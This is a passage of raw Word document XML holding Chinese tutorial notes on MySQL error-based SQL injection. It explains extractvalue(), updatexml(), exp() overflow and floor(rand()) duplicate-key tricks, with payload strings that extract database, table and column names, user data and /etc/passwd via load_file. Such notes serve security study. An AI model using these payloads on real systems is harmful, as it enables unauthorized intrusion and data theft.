    <w:p w14:paraId="6F5C23A3" w14:textId="4EBF3439" w:rsidR="00300BB3" w:rsidRDefault="00300BB3" w:rsidP="00C21AF8">
      <w:pPr>
        <w:pStyle w:val="4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报错注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755DBD8B" w14:textId="6905B64F" w:rsidR="00DC5BB6" w:rsidRDefault="00DC5BB6" w:rsidP="00C21AF8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC5BB6">
        <w:t xml:space="preserve"> extractvalue()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r w:rsidR="00A26D68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 适用mysql版本</w:t>
      </w:r>
      <w:r w:rsidR="00A26D68" w:rsidRPr="00A26D68">
        <w:t>5.1.5+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8FFD02" w14:textId="4FB75AB6" w:rsidR="00DC5BB6" w:rsidRDefault="00DC5BB6" w:rsidP="00124FC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作用：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC5BB6">
        <w:t>XML文档进行查询</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481FDAF3" w14:textId="13D24E2C" w:rsidR="00DC5BB6" w:rsidRDefault="00DC5BB6" w:rsidP="00124FC2">
      <w:r w:rsidRPr="00DC5BB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC5BB6">
        <w:t>extractvalue(目标xml文档，xml路径)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060DB2B3" w14:textId="05C9B72D" w:rsidR="00137198" w:rsidRDefault="00137198" w:rsidP="00124FC2">
      <w:r w:rsidRPr="00137198">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常查询</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r w:rsidRPr="00137198">
        <w:t>第二个参数的位置格式为 /xxx/xx/xx/x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x，</w:t>
      </w:r>
      <w:r w:rsidRPr="00137198">
        <w:t>即使查询不到也不会报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE72AAA" w14:textId="05993EE4" w:rsidR="00DC5BB6" w:rsidRDefault="00DC5BB6" w:rsidP="00124FC2">
      <w:r w:rsidRPr="00DC5BB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二个参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC5BB6">
        <w:t xml:space="preserve"> xml中的位置是可操作的地方，xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式，如果我们写入其他格式，就会报错，并且会返回我们写入的非法格式内容，而这个非法的内容就是我们想要查询的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630E5398" w14:textId="6BEE4EE9" w:rsidR="00EE3676" w:rsidRDefault="00EE3676" w:rsidP="00124FC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该函数中也可以使用concat</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00053329">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，不影响正常情况的执行，但在报错注入中可以单独分隔出要执行的语句得以使其单独执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF8A25B" w14:textId="79363567" w:rsidR="002C450F" w:rsidRDefault="002C450F" w:rsidP="00124FC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E30011B" w14:textId="32A738E8" w:rsidR="002C450F" w:rsidRPr="002C450F" w:rsidRDefault="002C450F" w:rsidP="002C450F">
      <w:r w:rsidRPr="002C450F">
        <w:t>select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘</w:t>
      </w:r>
      <w:r>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="002C450F">
        <w:t>’,(</w:t>
      </w:r>
      <w:r w:rsidRPr="00971C0B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>select database()</w:t>
      </w:r>
      <w:r w:rsidRPr="002C450F">
        <w:t>))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1706C10E" w14:textId="11610AB5" w:rsidR="00AE3060" w:rsidRDefault="002C450F" w:rsidP="00124FC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的波浪号‘~’即为写入的语法错误，致使数据库报错，回显出database</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E48EEE" w14:textId="4B2949AE" w:rsidR="00971C0B" w:rsidRDefault="00971C0B" w:rsidP="00124FC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后修改黄色处的语句便可查询表名、字段名以及字段值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FC7CFE" w14:textId="308B3332" w:rsidR="00971C0B" w:rsidRDefault="007D7D0F" w:rsidP="00C21AF8">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00971C0B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00971C0B" w:rsidRPr="00971C0B">
        <w:t xml:space="preserve"> updatexml()</w:t>
      </w:r>
      <w:r w:rsidR="00A26D68">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A26D68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>适用m</w:t>
      </w:r>
      <w:r w:rsidR="00A26D68">
        <w:t>ysql</w:t>
      </w:r>
      <w:r w:rsidR="00A26D68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
      <w:r w:rsidR="00A26D68" w:rsidRPr="00A26D68">
        <w:t>5.1.5+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38038ADF" w14:textId="71715F5F" w:rsidR="00971C0B" w:rsidRDefault="00971C0B" w:rsidP="00971C0B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法：</w:t>
      </w:r>
      <w:r>
        <w:t>updatexml(目标xml文档，xml路径，更新的内容)</w:t>
      </w:r>
      <w:r w:rsidR="00DC2314">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63850B57" w14:textId="5BDA9DA8" w:rsidR="00DC2314" w:rsidRDefault="00DC2314" w:rsidP="00971C0B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC5BB6">
        <w:t>extractvalue()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数相似，在第二个参数处构造查询语句，并构造非法的函数内语句来返回报错信息，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2484089E" w14:textId="5C1447DE" w:rsidR="00DC2314" w:rsidRDefault="00DC2314" w:rsidP="00971C0B">
      <w:r w:rsidRPr="00DC2314">
        <w:t>1' and updatexml(1,concat(</w:t>
      </w:r>
      <w:r w:rsidR="0027775D">
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2314">
        <w:t>,(</w:t>
      </w:r>
      <w:r w:rsidRPr="0027775D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>select database()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2314">
        <w:t>),</w:t>
      </w:r>
      <w:r w:rsidR="0027775D">
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2314">
        <w:t>),1)</w:t>
      </w:r>
      <w:r w:rsidR="0027775D">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2314">
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidR="0027775D">
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="0027775D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1116001E" w14:textId="475FAA71" w:rsidR="0027775D" w:rsidRDefault="0027775D" w:rsidP="00971C0B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样是改变黄色部分内容</w:t>
      </w:r>
      <w:r w:rsidR="00C4698A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询</w:t>
      </w:r>
      <w:r w:rsidR="00C4698A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句，以下为参考语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1A8B7D" w14:textId="29253CFD" w:rsidR="00C4698A" w:rsidRDefault="00C4698A" w:rsidP="00971C0B">
      <w:r w:rsidRPr="00C4698A">
        <w:t>1'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C4698A">
        <w:t xml:space="preserve">and updatexml(1,concat(0x5c,(select group_concat(table_name) from </w:t>
      </w:r>
      <w:r w:rsidRPr="00C4698A">
        <w:lastRenderedPageBreak/>
        <w:t>information_schema.tables where table_schema='security'),0x5c),1)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A18530" w14:textId="4FBB2F1B" w:rsidR="00872D68" w:rsidRDefault="00A26D68" w:rsidP="00971C0B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A26D68">
        <w:t xml:space="preserve"> exp(int)函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A26D68">
        <w:t>BigInt数据类型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>溢出进行报错；</w:t>
      </w:r>
      <w:r w:rsidRPr="00A26D68">
        <w:t>mysql数据库版本5.5.5~5.5.49</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A139C71" w14:textId="3EBAA9DF" w:rsidR="00A26D68" w:rsidRDefault="00A26D68" w:rsidP="00971C0B">
      <w:r w:rsidRPr="00A26D68">
        <w:t>exp(int)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A26D68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数作用：返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00A26D68">
        <w:t>e的x次方，当x的值足够大的时候就会导致函数的结果数据类型溢出，也就会因此报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A13B47E" w14:textId="0A61E519" w:rsidR="00A26D68" w:rsidRDefault="00A26D68" w:rsidP="00971C0B">
      <w:r w:rsidRPr="00A26D68">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数成功执行时，会返回</w:t>
      </w:r>
      <w:r w:rsidRPr="00A26D68">
        <w:t>0，那么将0按位取反，</w:t>
      </w:r>
      <w:r w:rsidR="00660497">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为</w:t>
      </w:r>
      <w:r w:rsidR="00660497" w:rsidRPr="00A26D68">
        <w:t>exp(int)</w:t>
      </w:r>
      <w:r w:rsidR="00660497">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00A26D68">
        <w:t>，就会造成BigInt大数据类型溢出</w:t>
      </w:r>
      <w:r w:rsidR="00660497">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBC33D1" w14:textId="77777777" w:rsidR="00660497" w:rsidRDefault="00660497" w:rsidP="00971C0B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689E9851" w14:textId="351CA49B" w:rsidR="00660497" w:rsidRDefault="00660497" w:rsidP="00971C0B">
      <w:r w:rsidRPr="00660497">
        <w:t>and exp(~(select * from (select user())a))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785F2E62" w14:textId="375F4140" w:rsidR="00352859" w:rsidRDefault="00352859" w:rsidP="00352859">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上述语句作用是：</w:t>
      </w:r>
      <w:r>
        <w:t>先查询select user()这个语句的结果，然后将查询出来的数据作为一个结果集取名为a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用</w:t>
      </w:r>
      <w:r>
        <w:t>select * from a 查询a，将结果集a全部查询出来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E39352" w14:textId="5C570A1E" w:rsidR="00660497" w:rsidRDefault="00352859" w:rsidP="00352859">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>查询完成，语句成功执行，返回值为0，再取反获取，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后在</w:t>
      </w:r>
      <w:r>
        <w:t>exp调用的时候报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653FBB70" w14:textId="55036610" w:rsidR="00352859" w:rsidRDefault="00352859" w:rsidP="00352859">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ayload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E9ADD3" w14:textId="4B7CC95D" w:rsidR="00352859" w:rsidRDefault="00352859" w:rsidP="00352859">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A107A">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>and exp(~(select * from (select table_name from information_schema.tables where table_schema=database() limit 0,1)a))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151F0742" w14:textId="0D1D3442" w:rsidR="001A107A" w:rsidRPr="001A107A" w:rsidRDefault="001A107A" w:rsidP="00352859">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A107A">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>and exp(~(select * from (select column_name from information_schema.columns where table_name='users' limit 0,1)a))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0850BC" w14:textId="4987720D" w:rsidR="001A107A" w:rsidRPr="001A107A" w:rsidRDefault="001A107A" w:rsidP="00352859">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A107A">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>and exp(~(select * from</w:t>
      </w:r>
      <w:r w:rsidR="0098040F">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A107A">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select username from 'usres' limit 0,1)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E378A4" w14:textId="55F5D81C" w:rsidR="001A107A" w:rsidRDefault="001A107A" w:rsidP="00352859">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A107A">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>and exp(~(select * from (select load_file('/etc/passwd'))a))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537093D2" w14:textId="6FD9ADB3" w:rsidR="00FE3D2F" w:rsidRPr="00FE3D2F" w:rsidRDefault="00FE3D2F" w:rsidP="00FE3D2F">
      <w:r w:rsidRPr="00FE3D2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE3D2F">
        <w:t>exp()的参数大于709时就会造成溢出，报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2AABBA" w14:textId="3265946D" w:rsidR="00352859" w:rsidRDefault="009D77FE" w:rsidP="00352859">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主键重复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFBF66E" w14:textId="02C91648" w:rsidR="009D77FE" w:rsidRDefault="009D77FE" w:rsidP="00352859">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用函数</w:t>
      </w:r>
      <w:r w:rsidRPr="009D77FE">
        <w:t>floor()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D77FE">
        <w:t>+ rand()</w:t>
      </w:r>
      <w:r w:rsidR="001210D8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D77FE">
        <w:t>+ count()</w:t>
      </w:r>
      <w:r w:rsidR="001210D8">
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidR="001210D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>group</w:t>
      </w:r>
      <w:r w:rsidR="001210D8">
        <w:t xml:space="preserve"> by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F619A2A" w14:textId="083247AD" w:rsidR="009D77FE" w:rsidRDefault="009D77FE" w:rsidP="00352859">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>floor</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数：向下取整；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229718C2" w14:textId="2239D962" w:rsidR="002A24F8" w:rsidRDefault="002A24F8" w:rsidP="00352859">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rand(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数：产生一个0到1之间的随机数；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20554651" w14:textId="672DB275" w:rsidR="002A24F8" w:rsidRDefault="001210D8" w:rsidP="00352859">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>count(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数：</w:t>
      </w:r>
      <w:r w:rsidRPr="001210D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回表中的行数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可进行条件筛选；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F242D76" w14:textId="79F9BBC5" w:rsidR="001210D8" w:rsidRDefault="001210D8" w:rsidP="00352859">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>group</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="004E515E" w:rsidRPr="004E515E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据一个或多个列对结果集进行分组</w:t>
      </w:r>
      <w:r w:rsidR="004E515E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="004E515E" w:rsidRPr="004E515E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="004E515E" w:rsidRPr="004E515E">
        <w:t>group by 进行分组查询的时候，数据库会生成一张虚拟表</w:t>
      </w:r>
      <w:r w:rsidR="00D21802">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA5651B" w14:textId="33FEB628" w:rsidR="00D21802" w:rsidRPr="000F27EF" w:rsidRDefault="00D21802" w:rsidP="00352859">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>见语句：</w:t>
      </w:r>
      <w:r w:rsidRPr="000F27EF">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select count(*),concat(database(),floor(rand(0)*2)) as x from users group by x --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105FFF1E" w14:textId="2E76D957" w:rsidR="00622949" w:rsidRDefault="00622949" w:rsidP="00622949">
      <w:r w:rsidRPr="000F27EF">
        <w:rPr>
          <w:rStyle w:val="afc"/>
        </w:rPr>
        <w:t>select count(*)from users group by concat(database(),floor(rand(0)*2)) --+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（两句相同）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B83D4E" w14:textId="77777777" w:rsidR="00622949" w:rsidRDefault="00622949" w:rsidP="00622949"/>
    <w:p w14:paraId="733A4409" w14:textId="6814D8F0" w:rsidR="00622949" w:rsidRDefault="00622949" w:rsidP="00352859">
      <w:r w:rsidRPr="00D21802">
        <w:t>floor(rand()*2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9EE2E3" w14:textId="34B7335D" w:rsidR="00D21802" w:rsidRDefault="00D21802" w:rsidP="00352859">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会随机产生0或1其中一个值</w:t>
      </w:r>
      <w:r w:rsidR="00C41A0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222EE792" w14:textId="4465237B" w:rsidR="00D21802" w:rsidRDefault="00D21802" w:rsidP="00352859">
      <w:r w:rsidRPr="00D21802">
        <w:t>concat()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拼接随机产生</w:t>
      </w:r>
      <w:r w:rsidRPr="00D21802">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>database()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D21802">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>database()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D21802">
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770F024B" w14:textId="177FC7E6" w:rsidR="006B3C1F" w:rsidRDefault="006B3C1F" w:rsidP="00352859">
      <w:r w:rsidRPr="006B3C1F">
        <w:t>group by在执行时，会依次取出查询表中的记录并创建一个临时表，group by的对象便是该临时表的主键。如果临时表中已经存在该主键，则将值加1，如果不存在，则将该主键插入到临时表中</w:t>
      </w:r>
      <w:r w:rsidR="00C41A0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C247F53" w14:textId="4501EBD2" w:rsidR="00C41A0E" w:rsidRDefault="00C41A0E" w:rsidP="00352859">
      <w:r w:rsidRPr="00C41A0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个最重要的特性，就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00C41A0E">
        <w:t>group by与rand()使用时，如果临时表中没有该主键，则在插入前rand()会再计算一次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个特性导致了主键重复报错。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2004D098" w14:textId="2F68DA91" w:rsidR="00622949" w:rsidRDefault="00C41A0E" w:rsidP="00352859">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如当表中已经存在了security</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主键，某次插入判断时</w:t>
      </w:r>
      <w:r w:rsidR="00B910F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，插入对象为security</w:t>
      </w:r>
      <w:r w:rsidR="00B910F2">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00B910F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则允许将该主键插入表中，但在插入过程中rand</w:t>
      </w:r>
      <w:r w:rsidR="00B910F2">
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00B910F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新计算为1，则插入主键成为security</w:t>
      </w:r>
      <w:r w:rsidR="00B910F2">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00B910F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即使表中已经存在security</w:t>
      </w:r>
      <w:r w:rsidR="00B910F2">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00B910F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
